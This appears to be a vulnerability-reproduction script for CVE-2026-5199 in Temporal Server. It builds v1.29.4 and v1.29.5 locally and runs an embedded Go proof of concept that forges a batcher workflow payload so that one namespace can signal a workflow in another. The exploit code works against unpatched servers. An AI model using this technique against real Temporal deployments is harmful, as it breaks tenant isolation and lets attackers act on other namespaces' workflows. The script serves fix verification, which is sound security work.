#!/bin/bash
#
# Reproduce CVE-2026-5199 (Temporal Server batcher cross-namespace
# authorization bypass) against real servers built from v1.29.4 (expected
# vulnerable) and v1.29.5 (expected fixed).
#
# Environment:
#   PRUVA_ROOT  working root; defaults to the parent of this script's
#               directory. Logs go to $PRUVA_ROOT/logs, the runtime manifest
#               to $PRUVA_ROOT/repro, and the temporal checkout to
#               $PRUVA_ROOT/external/temporal.
# Requires: git and go on PATH; access to github.com when cloning/fetching.
set -euo pipefail

ROOT="${PRUVA_ROOT:-$(cd "$(dirname "$0")/.." && pwd)}"
LOGS="$ROOT/logs"
REPRO_DIR="$ROOT/repro"
mkdir -p "$LOGS" "$REPRO_DIR"

REPO_DIR="$ROOT/external/temporal"
SERVER_BIN="$REPO_DIR/temporal-server"
REPRO_GO="$REPO_DIR/repro_main.go"

echo "[+] Temporal Server CVE-2026-5199 Real-Server Reproduction"
echo "[+] Root: $ROOT"

# Fail fast with a clear message instead of "command not found" midway.
for tool in git go; do
    if ! command -v "$tool" >/dev/null 2>&1; then
        echo "[-] Required tool '$tool' not found in PATH" >&2
        exit 1
    fi
done

# Clone repo if not present
if [ ! -d "$REPO_DIR/.git" ]; then
    echo "[+] Cloning temporal repo..."
    mkdir -p "$ROOT/external"
    git clone --depth=100 https://github.com/temporalio/temporal.git "$REPO_DIR"
fi

cd "$REPO_DIR"

# The shallow clone may not contain the release tags. Check for BOTH tags,
# not just the first, so a checkout holding only one of them is repaired too.
missing_tag=0
for tag in v1.29.4 v1.29.5; do
    if ! git rev-parse --verify --quiet "refs/tags/$tag" >/dev/null; then
        missing_tag=1
    fi
done
if [ "$missing_tag" -eq 1 ]; then
    echo "[+] Fetching tags..."
    git fetch --depth=200 origin tag v1.29.4 tag v1.29.5
fi
# Write the standalone Go repro program. It is placed in the temporal checkout
# because it imports go.temporal.io/server/... packages from that module.
#
# What the program does against the server on 127.0.0.1:7233:
#   1. registers attacker-ns and victim-ns (errors are only printed, not fatal)
#   2. starts workflow victim-wf-1 in victim-ns
#   3. starts the internal "temporal-sys-batch-workflow-protobuf" workflow in
#      attacker-ns on the per-namespace worker task queue, with a forged
#      BatchOperationInput whose NamespaceId is attacker-ns but whose embedded
#      request targets victim-ns and signals victim-wf-1
#   4. sleeps 15s, then counts WorkflowExecutionSignaled events in the
#      victim's history
#
# Program exit status:
#   0 - prints "VULNERABLE": the victim workflow received >= 1 signal
#   1 - prints "FIXED": the victim workflow received no signals
#   2 - harness error (dial, start victim, describe attacker-ns, payload
#       encode, start batch workflow, or history read failed)
# The quoted 'EOF' delimiter keeps the shell from expanding anything inside.
cat > "$REPRO_GO" << 'EOF'
package main

import (
	"context"
	"fmt"
	"os"
	"time"

	"github.com/pborman/uuid"
	batchpb "go.temporal.io/api/batch/v1"
	commonpb "go.temporal.io/api/common/v1"
	enumspb "go.temporal.io/api/enums/v1"
	taskqueuepb "go.temporal.io/api/taskqueue/v1"
	"go.temporal.io/api/workflowservice/v1"
	"google.golang.org/grpc"
	"google.golang.org/grpc/credentials/insecure"
	"google.golang.org/protobuf/types/known/durationpb"
	batchspb "go.temporal.io/server/api/batch/v1"
	"go.temporal.io/server/common/payloads"
	"go.temporal.io/server/common/primitives"
)

func main() {
	conn, err := grpc.Dial("127.0.0.1:7233", grpc.WithTransportCredentials(insecure.NewCredentials()))
	if err != nil {
		fmt.Fprintf(os.Stderr, "grpc dial: %v\n", err)
		os.Exit(2)
	}
	defer conn.Close()

	client := workflowservice.NewWorkflowServiceClient(conn)
	ctx := context.Background()

	// Create namespaces
	for _, ns := range []string{"attacker-ns", "victim-ns"} {
		_, err := client.RegisterNamespace(ctx, &workflowservice.RegisterNamespaceRequest{
			Namespace:                        ns,
			WorkflowExecutionRetentionPeriod: durationpb.New(24 * time.Hour),
			VisibilityArchivalState:          enumspb.ARCHIVAL_STATE_DISABLED,
			HistoryArchivalState:             enumspb.ARCHIVAL_STATE_DISABLED,
		})
		if err != nil {
			fmt.Fprintf(os.Stderr, "RegisterNamespace %s: %v\n", ns, err)
		}
	}

	// Start a victim workflow
	victimWF, err := client.StartWorkflowExecution(ctx, &workflowservice.StartWorkflowExecutionRequest{
		Namespace:    "victim-ns",
		WorkflowId:   "victim-wf-1",
		WorkflowType: &commonpb.WorkflowType{Name: "VictimWorkflow"},
		TaskQueue:    &taskqueuepb.TaskQueue{Name: "victim-tq"},
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Start victim workflow: %v\n", err)
		os.Exit(2)
	}

	// Get attacker namespace ID
	descResp, err := client.DescribeNamespace(ctx, &workflowservice.DescribeNamespaceRequest{
		Namespace: "attacker-ns",
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Describe attacker-ns: %v\n", err)
		os.Exit(2)
	}
	attackerNSID := descResp.NamespaceInfo.Id

	// Construct forged batch payload: NamespaceId matches attacker-ns,
	// but Request.Namespace points to victim-ns.
	batchParams := &batchspb.BatchOperationInput{
		NamespaceId: attackerNSID,
		BatchType:   enumspb.BATCH_OPERATION_TYPE_SIGNAL,
		Request: &workflowservice.StartBatchOperationRequest{
			Namespace: "victim-ns",
			JobId:     uuid.New(),
			Reason:    "test-reason",
			Executions: []*commonpb.WorkflowExecution{
				{WorkflowId: "victim-wf-1", RunId: victimWF.RunId},
			},
			Operation: &workflowservice.StartBatchOperationRequest_SignalOperation{
				SignalOperation: &batchpb.BatchOperationSignal{
					Signal:   "test-signal",
					Identity: "test-identity",
				},
			},
		},
	}

	inputPayload, err := payloads.Encode(batchParams)
	if err != nil {
		fmt.Fprintf(os.Stderr, "Encode payload: %v\n", err)
		os.Exit(2)
	}

	// Start the internal batcher workflow in attacker-ns with the forged payload.
	_, err = client.StartWorkflowExecution(ctx, &workflowservice.StartWorkflowExecutionRequest{
		Namespace:    "attacker-ns",
		WorkflowId:   "batch-test-1",
		WorkflowType: &commonpb.WorkflowType{Name: "temporal-sys-batch-workflow-protobuf"},
		TaskQueue:    &taskqueuepb.TaskQueue{Name: primitives.PerNSWorkerTaskQueue},
		Input:        inputPayload,
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Start batch workflow: %v\n", err)
		os.Exit(2)
	}

	// Wait for the batcher worker to process.
	time.Sleep(15 * time.Second)

	// Query victim workflow history for signal events.
	histResp, err := client.GetWorkflowExecutionHistory(ctx, &workflowservice.GetWorkflowExecutionHistoryRequest{
		Namespace: "victim-ns",
		Execution: &commonpb.WorkflowExecution{
			WorkflowId: "victim-wf-1",
			RunId:        victimWF.RunId,
		},
	})
	if err != nil {
		fmt.Fprintf(os.Stderr, "Get history: %v\n", err)
		os.Exit(2)
	}

	var signalCount int
	for _, ev := range histResp.History.Events {
		if ev.EventType == enumspb.EVENT_TYPE_WORKFLOW_EXECUTION_SIGNALED {
			signalCount++
		}
	}

	if signalCount > 0 {
		fmt.Printf("VULNERABLE: victim workflow received %d signal(s)\n", signalCount)
		os.Exit(0)
	} else {
		fmt.Printf("FIXED: victim workflow received 0 signals\n")
		os.Exit(1)
	}
}
EOF

# Probe host:port by opening a TCP connection through bash's /dev/tcp
# pseudo-device (a bash feature, so this is NOT portable to POSIX sh).
# A newline is written and the connection is closed when the subshell exits.
# Arguments: $1 - host (default 127.0.0.1); $2 - port (default 7233)
# Returns:   0 if the connection succeeded, 1 otherwise
port_listening() {
	local host="${1:-127.0.0.1}" port="${2:-7233}"
	if ! (echo > "/dev/tcp/${host}/${port}") >/dev/null 2>&1; then
		return 1
	fi
	return 0
}

# Poll once per second until something accepts TCP connections on
# 127.0.0.1:7233.
# Arguments:
#   $1 - server log file; its last 20 lines are printed to stderr on failure
#   $2 - maximum number of polls / seconds to wait (default 60)
#   $3 - optional server PID; when given, give up as soon as that process
#        has exited instead of waiting out the whole timeout
# Returns: 0 once the port is listening, 1 on timeout or early server exit
wait_for_server() {
	local logfile=$1
	local max_wait=${2:-60}
	local pid=${3:-}
	local waited
	echo "[+] Waiting for server port 7233 (up to ${max_wait}s)..."
	for ((waited = 0; waited < max_wait; waited++)); do
		if port_listening 127.0.0.1 7233; then
			echo "[+] Server port 7233 is listening after ${waited}s"
			return 0
		fi
		# A crashed server will never open the port; fail fast with its log.
		if [[ -n "$pid" ]] && ! kill -0 "$pid" 2>/dev/null; then
			echo "[-] Server process $pid exited before port 7233 was listening" >&2
			echo "[-] Last server log lines:" >&2
			tail -20 "$logfile" >&2 || true
			return 1
		fi
		sleep 1
	done
	echo "[-] Server port 7233 did not become listening within ${max_wait}s" >&2
	echo "[-] Last server log lines:" >&2
	tail -20 "$logfile" >&2 || true
	return 1
}

# Kill a server started by run_version and reap it, so the process is gone
# (and its listening socket closed) before the next version is started.
# Arguments: $1 - PID of a background child of this shell
stop_server() {
	local pid=$1
	kill -9 "$pid" 2>/dev/null || true
	# wait only reaps children of this shell; its stderr is discarded so the
	# job-termination notice does not clutter the output.
	{ wait "$pid"; } 2>/dev/null || true
}

# Build one Temporal server version, run the repro program against it, and
# shut the server down again. Assumes the current directory is the temporal
# checkout (./cmd/server is built relative to it).
# Globals (read): SERVER_BIN, REPRO_GO, REPO_DIR, LOGS
# Arguments:
#   $1 - git ref to check out and build (e.g. v1.29.4)
#   $2 - file receiving the repro program's build and run output
# Outputs: server output to $LOGS/server_<ref>.log, its PID to
#   $LOGS/server_<ref>.pid
# Returns: the repro program's own exit status (0 = victim signalled,
#   1 = victim not signalled, other = repro-side error), or 2 if port 7233 is
#   already taken, or checkout, either build, or server startup fails.
run_version() {
	local version=$1
	local logfile=$2
	local server_log="$LOGS/server_${version}.log"
	local repro_bin="$REPO_DIR/repro_bin"
	local i

	# Clean up stale servers before building, so go build never replaces a
	# binary that is still executing. Match the full binary path rather than
	# the bare word "temporal-server", which could also match unrelated
	# processes (including this script, if its path contains that word).
	echo "[+] Cleaning up old server processes..."
	pkill -9 -f -- "$SERVER_BIN" 2>/dev/null || true
	for ((i = 0; i < 10; i++)); do
		pgrep -f -- "$SERVER_BIN" >/dev/null 2>&1 || break
		sleep 1
	done
	# If something else still owns the port, the repro would silently run
	# against a server of unknown version; report an infrastructure failure.
	if port_listening 127.0.0.1 7233; then
		echo "[-] Port 7233 is already in use; cannot test $version" >&2
		return 2
	fi

	# Callers invoke this with errexit disabled, so each step is checked
	# explicitly: a failed checkout or build must not fall through to testing
	# a stale binary left over from the previous version.
	echo "[+] Building server $version..."
	if ! git checkout "$version"; then
		echo "[-] git checkout $version failed" >&2
		return 2
	fi
	if ! go build -o "$SERVER_BIN" ./cmd/server; then
		echo "[-] Server build for $version failed" >&2
		return 2
	fi

	# Build the repro to a binary instead of using `go run`: `go run` does not
	# propagate the program's exit status (a non-zero exit or a compile error
	# both surface as 1), which would turn a harness error into a false
	# "FIXED" verdict. Rebuilt per version because it imports
	# go.temporal.io/server packages from the checked-out tree.
	echo "[+] Building reproduction program..."
	if ! go build -o "$repro_bin" "$REPRO_GO" > "$logfile" 2>&1; then
		echo "[-] Reproduction build for $version failed (see $logfile)" >&2
		return 2
	fi

	# Start server in background (development-sqlite config)
	echo "[+] Starting server..."
	nohup "$SERVER_BIN" --allow-no-auth --env development-sqlite start > "$server_log" 2>&1 &
	local server_pid=$!
	echo "$server_pid" > "$LOGS/server_${version}.pid"

	if ! wait_for_server "$server_log" 60 "$server_pid"; then
		stop_server "$server_pid"
		return 2
	fi

	echo "[+] Running reproduction..."
	local result=0
	"$repro_bin" >> "$logfile" 2>&1 || result=$?

	stop_server "$server_pid"
	return "$result"
}

# --- VULNERABLE VERSION ---
# run_version's status is read as: 0 = victim signalled (bypass works),
# 1 = victim untouched, anything else = infrastructure failure.
# Capturing it with `|| VULN_RESULT=$?` keeps errexit from aborting here.
echo "[+] Testing vulnerable version v1.29.4..."
VULN_LOG="$LOGS/vuln_repro.log"
VULN_RESULT=0
run_version v1.29.4 "$VULN_LOG" || VULN_RESULT=$?
case "$VULN_RESULT" in
    0)
        echo "[+] VULNERABLE test PASSED — victim workflow received signal, bypass confirmed on v1.29.4"
        VULN_CONFIRMED=1
        ;;
    1)
        echo "[-] VULNERABLE test FAILED — victim workflow received 0 signals on v1.29.4"
        VULN_CONFIRMED=0
        ;;
    *)
        echo "[-] VULNERABLE test INFRASTRUCTURE FAILURE (exit $VULN_RESULT)"
        VULN_CONFIRMED=0
        ;;
esac

# --- FIXED VERSION ---
# Here the desired outcome is status 1 (victim untouched); 0 means the
# bypass still works, anything else is an infrastructure failure.
echo "[+] Testing fixed version v1.29.5..."
FIX_LOG="$LOGS/fix_repro.log"
FIX_RESULT=0
run_version v1.29.5 "$FIX_LOG" || FIX_RESULT=$?
case "$FIX_RESULT" in
    1)
        echo "[+] FIXED test FAILED as expected — fix correctly blocked the bypass on v1.29.5"
        FIX_CONFIRMED=1
        ;;
    0)
        echo "[-] FIXED test PASSED — fix may not be effective (victim still received signal)"
        FIX_CONFIRMED=0
        ;;
    *)
        echo "[-] FIXED test INFRASTRUCTURE FAILURE (exit $FIX_RESULT)"
        FIX_CONFIRMED=0
        ;;
esac

# Summary: one human-readable verdict line per version.
if [ "$VULN_CONFIRMED" = "1" ]; then
    vuln_label='CONFIRMED'
else
    vuln_label='NOT CONFIRMED'
fi
if [ "$FIX_CONFIRMED" = "1" ]; then
    fix_label='FIX VERIFIED'
else
    fix_label='FIX NOT VERIFIED'
fi
printf '\n%s\n' "===== SUMMARY ====="
printf 'Vulnerable v1.29.4: %s\n' "$vuln_label"
printf 'Fixed v1.29.5:     %s\n' "$fix_label"
printf 'Logs written to:   %s\n' "$LOGS"
printf '%s\n' "==================="

# Map a run_version exit status to the manifest's result vocabulary:
# 0 -> "pass" (victim workflow was signalled), 1 -> "fail" (it was not),
# anything else -> "error" (build/server/harness failure). An infrastructure
# failure is therefore not reported as a pass/fail verdict.
manifest_result() {
    case "$1" in
        0) echo 'pass' ;;
        1) echo 'fail' ;;
        *) echo 'error' ;;
    esac
}

# Write runtime manifest. The raw exit codes are recorded alongside the
# derived results so infrastructure failures remain visible.
cat > "$REPRO_DIR/runtime_manifest.json" << EOF
{
  "cve": "CVE-2026-5199",
  "description": "Temporal Server batcher worker cross-namespace authorization bypass",
  "reproduction_method": "Real Temporal server (SQLite in-memory) with forged BatchOperationInput injected via StartWorkflowExecution to temporal-sys-batch-workflow-protobuf",
  "vulnerable_version": "v1.29.4",
  "fixed_version": "v1.29.5",
  "vulnerable_test_result": "$(manifest_result "$VULN_RESULT")",
  "fixed_test_result": "$(manifest_result "$FIX_RESULT")",
  "vulnerable_exit_code": $VULN_RESULT,
  "fixed_exit_code": $FIX_RESULT,
  "vulnerability_confirmed": $([ "$VULN_CONFIRMED" = "1" ] && echo 'true' || echo 'false'),
  "fix_verified": $([ "$FIX_CONFIRMED" = "1" ] && echo 'true' || echo 'false'),
  "logs": {
    "vulnerable_repro": "$VULN_LOG",
    "fixed_repro": "$FIX_LOG"
  }
}
EOF

# Succeed only when both halves hold: the bypass reproduced on v1.29.4 AND
# it was blocked on v1.29.5.
if [[ "$VULN_CONFIRMED" != "1" || "$FIX_CONFIRMED" != "1" ]]; then
    echo "[-] Reproduction incomplete."
    exit 1
fi
echo "[+] Reproduction successful: vulnerability confirmed and fix verified."
exit 0
